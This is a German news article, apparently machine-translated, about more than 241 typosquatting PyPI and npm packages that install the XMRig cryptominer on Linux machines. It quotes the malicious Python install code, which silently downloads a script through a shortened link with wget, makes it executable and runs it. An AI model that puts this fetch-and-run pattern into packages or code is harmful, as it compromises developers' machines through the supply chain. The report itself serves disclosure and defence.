Sicherheitsforscher haben Hunderte von in PyPI- und npm-Register eingeschleusten Schadpaketen entdeckt, die in ihrem Code ein Kryptominer-Skript enthalten.
Die meisten dieser Pakete sind Tippfehler, deren Namen denen beliebter PyPI- oder npm-Pakete ähneln, um ahnungslose Installationen zu ermöglichen. Obwohl der Vorgang derzeit anscheinend eingestellt wurde, stellt er dennoch eine wachsende Bedrohung für diese Community dar.
Typosquatting als Haupttechnik
Trotz strengerer Sicherheitsregeln wie einer obligatorischen 2FA-Authentifizierung für Konten mit hoher Priorität sind die JavaScript- und Python-Paketregister immer noch das Ziel bösartiger Angriffe.
Der neueste Angriff wurde von einem Sicherheitsforscher namens Hauke ​​Lübbers, der mitteilte, dass „mindestens 33 Projekte“ auf PyPI XMRig hätten – einen Open-Source-Kryptominer für Monero. Bei diesen Projekten handelt es sich zumeist um Typosquats anderer beliebter Pakete wie React, Argparse und AIOHTTP, und ihre Skripte enthalten Cryptomininer.
Und noch ein weiterer Python pypi Tippfehler:
Innerhalb von 3 Stunden mindestens 33 Projekte hochgeladen.
Einige Beispiele:
– argpars
– Datenklassen-jso
– jupyter-cor
– Azure-MGM-Containerregistrierung
– python-dateuitl
– iohttp
7 Minuten zwischen Meldung und Abschaltung – genial @di_codes! pic.twitter.com/kUbS7PkSGQ— Hauke ​​Lübbers (@streamlin3d) 17. August 2022
Er bemerkte, dass der Bedrohungsakteur über den URL-Shortener Bit.ly ein Bash-Cryptomininer-Skript von einem Remote-Server herunterlud, wie unten zu sehen ist;
os.system("sudo wget https://bit[.]ly/3c2tMTT -O ./.cmc -L >/dev/null 2>&1")
os.system("chmod +x .cmc >/dev/null 2>&1")
os.system("./.cmc >/dev/null 2>&1")
Obwohl diese Website nun nicht mehr erreichbar ist, haben Sicherheitsforscher von Sonatype eine Kopie davon gefunden, die die schädlichen Skripte hostet. Außerdem entdeckten sie damit 186 npm-Typosquatting-Pakete! Darüber hinaus fand Hauke ​​Lübbers noch eine weitere Gruppe von 22 PyPI-Paketen mit derselben bösartigen Nutzlast.
Wenn diese Skripte von ahnungslosen Entwicklern installiert werden, benachrichtigen sie den Bedrohungsakteur über die IP-Adresse des kompromittierten Hosts und den Status der Cryptomininer-Bereitstellung. Insgesamt haben sie mehr als 241 bösartige NPM- und PyPI-Pakete mit Kryptominern gefunden – alle zielen auf Linux-Rechner ab.
Obwohl es immer noch eine wachsende Bedrohung für die Entwickler-Community darstellt, Die Register sind gut genug, um schnell zu reagieren, indem sie alle betroffenen Pakete sofort nach der Benachrichtigung entfernen. Entwicklern, die auf Open-Source-Skripte in PyPI und npm angewiesen sind, wird jedoch geraten, bei der Installation vorsichtig vorzugehen.
